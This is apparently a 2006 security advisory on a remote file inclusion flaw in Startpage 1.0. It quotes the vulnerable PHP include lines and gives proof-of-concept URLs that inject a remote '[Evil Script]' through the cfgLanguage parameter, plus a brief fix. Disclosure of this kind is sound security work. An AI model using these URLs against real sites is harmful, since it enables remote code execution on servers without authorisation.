Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability



--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version : 1.0
Venedor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 Is a Script Which Shows Your Favortie Links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.
----------------------------------------edit.php--------------------------------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php
& PageTop.php
--------------------------------------------------------------------------------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams



Relevant Pages

  • myEvent <= 1.4 Multiple Remote File Include Vulnerabilities
    ... myEvent 1.4 Multiple Remote File Include Vulnerabilities ... Vulnerability Script ... Venedor Contacted, But No Response. ...
    (Bugtraq)
  • PHP SCRIPT
    ... php classified script ... guestbook ardguest free php guestbook script ... php file upload script ...
    (sci.chem.labware)
  • Re: [PHP] PHP console script vs C/C++/C#
    ... My script is taking a longer time to execute than I want. ... I prefer to write in PHP because that is what I know best. ... This is why I am thinking about rewriting my whole script in a C language. ... Perhaps there are different methods I could be using to speed up execution. ...
    (php.general)
  • Re: How to Add a Feeback Form
    ... I saw nothing in that script that indicates where the form is e-mailed to so ... Greg Maxey/Word MVP ... PHP or not. ... have the support available yet. ...
    (microsoft.public.frontpage.programming)
  • How best to show PHP source? (was: One page, multiple submit buttons)
    ... script to add to the top of a PHP script to enable showing its ... Maybe anybody submitting their own PHP code for critique here ... Anything posted to a newsgroup is a "snapshot" of what the ... there ought to be a FAQ for this ...
    (comp.lang.php)